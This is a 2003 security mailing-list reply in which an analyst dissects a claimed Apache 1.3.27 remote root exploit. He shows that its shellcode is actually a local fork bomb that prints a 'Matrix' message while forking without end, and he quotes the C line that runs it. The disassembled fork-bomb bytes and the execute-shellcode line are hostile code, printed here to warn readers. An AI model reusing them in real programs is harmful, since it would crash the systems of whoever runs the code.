Re: Apache 1.3.27 Remote Root 0-Day

[Joe Stewart <jstewart () lurhq com>]

On Friday 20 June 2003 11:15 am, Michael wrote:
> Maybe now we can STFU and concentrate on actual disclosure?
> I'm curious as to why there has been no discussion about this apache
> report.
>
> The poster of this message didnt include any info on the details of the
> problem nor an exploit, which leaves us wondering.  (The insult was cute
> though)

There was exploit code included in the message I got. Taking apart the
shellcode we see:

   0:   31 db                   xor    %ebx,%ebx
   2:   31 c0                   xor    %eax,%eax
   4:   31 d2                   xor    %edx,%edx
   6:   b2 18                   mov    $0x18,%dl 
   8:   68 20 3f 21 0a          push   $0xa213f20        ; " ?!\n"
   d:   68 54 52 31 58          push   $0x58315254      ; "TR1X"
  12:   68 65 20 4d 34          push   $0x344d2065      ; "e M4"
  17:   68 73 20 54 68          push   $0x68542073      ; "s Th"
  1c:   68 61 74 20 69          push   $0x69207461      ; "at i"
  21:   68 2d 2d 57 68          push   $0x68572d2d      ; "--Wh"
  26:   89 e1                   mov    %esp,%ecx        ; pointer to string
  28:   b0 04                   mov    $0x4,%al
  2a:   cd 80                   int    $0x80            ; syscall_write
  2c:   b8 02 00 00 00          mov    $0x2,%eax
  31:   cd 80                   int    $0x80            ; syscall_fork
  33:   eb f7                   jmp    0x2c     ; loop
... garbage code follows

So, the shellcode is a fork bomb, printing "--What is The M4TR1X ?!" 
over and over until the system can no longer fork processes.

Looking at the C code, we see this line:
void(*b)()=(void*)shellcode;b();

Which executes the shellcode locally. In other words, don't run this.

-Joe

-- 
Joe Stewart, GCIH 
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html